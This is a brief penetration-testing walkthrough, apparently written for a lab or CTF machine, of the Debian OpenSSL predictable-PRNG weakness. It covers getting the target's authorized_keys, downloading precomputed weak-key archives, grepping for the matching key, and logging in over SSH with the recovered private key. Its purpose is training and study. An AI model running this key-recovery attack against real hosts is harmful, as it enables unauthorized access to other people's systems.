Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH
https://osandamalith.com/2013/11/16/rooting-pwnos/
https://www.exploit-db.com/exploits/5632
https://github.com/g0tmi1k/debian-ssh
On the target host, we find it with seeing blacklist rsa, blacklist dsa keys files, or checking version of openssl.
$ openssl
> version
Since the random number generator does not work as it should, the generated keys are exposed to brute force.
We had obtained the authorized_keys file from the target machine. This file contains public keys. We will try to find the private key of this key.
We need to specify key method via authorized_keys file. At the beginning of the file we can see the method.
For dsa - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5632.tar.bz2
For ssh-rsa - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2
After the extracting the zip file, we will get in the directory. We need to select related part of authorized_keys file, then we search it in the directory with grep.
$ grep -rl PUBLIC_KEY_PART *.pub
00005b35764e0b2401a9dcbca5b6b6b5-1390.pub
chmod 600 00005b35764e0b2401a9dcbca5b6b6b5-1390
# For dsa
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oPubkeyAcceptedKeyTypes=+ssh-dss -i 00005b35764e0b2401a9dcbca5b6b6b5-1390 -o PasswordAuthentication=no test@192.168.1.2
Last updated